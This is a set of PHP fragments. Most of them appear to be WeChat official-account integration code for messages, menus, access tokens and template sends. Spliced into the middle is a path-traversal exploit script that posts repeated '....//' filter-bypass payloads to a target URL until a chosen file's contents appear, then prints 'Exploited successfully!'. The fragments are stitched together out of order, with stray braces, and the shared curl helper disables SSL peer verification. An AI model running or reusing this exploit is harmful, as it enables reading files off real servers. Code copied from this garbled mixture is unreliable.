function wx_message($uid, $title, $description, $url, $picurl) { $uid = intval($uid); $Token = getToken($this->config); $WxUrl = 'https://api.weixin.qq.com/cgi-bin/message/custom/send?access_token=' . $Token; $Touser = '******'; $Data = '{ "touser":"******", "msgtype":"news", "news":{ "articles": [ { "title":"' . iconv('gbk', 'utf-8', $title) . '", "description":"' . iconv('gbk', 'utf-8', $description) . '", "url":"' . $url . '", "picurl":"' . $picurl . '" } ] } }'; $return = CurlPost($WxUrl, $Data); }
$url = $argv[1]; $data = $argv[2]; $needle = $argv[3]; /** Curl function with appropriate adjustments **/ function CurlPost($url = 'localhost', $data = array()) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 50); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); return curl_exec($ch); curl_close($ch); } list($param, $file) = explode(':', $data); $FilterBypassing = '....//'; for ($i = 0; $i < 10; $i++) { $DataToPost[$param] = $FilterBypassing . $file; $response = CurlPost($url, $DataToPost); if (strstr($response, $needle) !== FALSE) { echo $response; echo "\n\nExploited successfully!\n"; echo 'Payload: ', $DataToPost[$param], "\n\n\n"; die; } $FilterBypassing .= '....//'; }
public function creat_action() { $list = $this->obj->DB_select_all("wxnav", "1 ORDER BY `keyid` ASC,`sort` ASC"); if (is_array($list)) { foreach ($list as $value) { if ($value['keyid'] == '0') { $navlist[$value['id']] = $value; } } foreach ($list as $val) { foreach ($navlist as $key => $v) { if ($v['id'] == $val['keyid']) { $navlist[$key]['list'][] = $val; } } } $CreatNav = '{"button":['; $i = 0; foreach ($navlist as $key => $value) { if ($i < 1) { $CreatNav .= '{"name":"' . iconv('gbk', 'utf-8', $value['name']) . '","sub_button":['; } else { $CreatNav .= ',{"name":"' . iconv('gbk', 'utf-8', $value['name']) . '","sub_button":['; } $i++; $NavInfo = array(); if (is_array($value['list']) && !empty($value['list'])) { foreach ($value['list'] as $k => $v) { if ($k > 0) { $CreatNav .= ','; } if ($v['type'] == 'click') { $CreatNav .= '{"type":"click","name":"' . iconv('gbk', 'utf-8', $v['name']) . '","key":"' . iconv('gbk', 'utf-8', $v['key']) . '"}'; } elseif ($v['type'] == 'view') { $CreatNav .= '{"type":"view","name":"' . iconv('gbk', 'utf-8', $v['name']) . '","url":"' . $v['url'] . '"}'; } } } $CreatNav .= ']}'; } $CreatNav .= ']}'; $Token = getToken($this->config); $DelUrl = 'https://api.weixin.qq.com/cgi-bin/menu/delete?access_token=' . $Token; CurlPost($DelUrl); $Url = "https://api.weixin.qq.com/cgi-bin/menu/create?access_token=" . $Token; $result = CurlPost($Url, $CreatNav); $Info = json_decode($result); if ($Info->errcode == '0' || $Info->errmsg == 'ok') { echo 1; die; } else { echo 2; die; } } }
function getToken($config) { $Token = $config['token']; $TokenTime = $config['token_time']; $NowTime = time(); if ($NowTime - $TokenTime > 7000) { $Appid = $config['wx_appid']; $Appsecert = $config['wx_appsecret']; $Url = 'https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=' . $Appid . '&secret=' . $Appsecert; $CurlReturn = CurlPost($Url); $Token = json_decode($CurlReturn); $config['token'] = $Token->access_token; $config['token_time'] = time(); made_web(PLUS_PATH . "config.php", ArrayToString($config), "config"); return $config['token']; } else { return $Token; } }
function sendWxTemplate($wxid, $tempid, $url, $data) { global $config; $Token = getToken($config); $wxUrl = 'https://api.weixin.qq.com/cgi-bin/message/template/send?access_token=' . $Token; $templateDate = array("touser" => $wxid, "template_id" => $tempid, "url" => $url, "topcolor" => "#FF0000", "data" => $data); $CurlReturn = CurlPost($wxUrl, json_encode($templateDate)); $UserInfo = json_decode($CurlReturn); }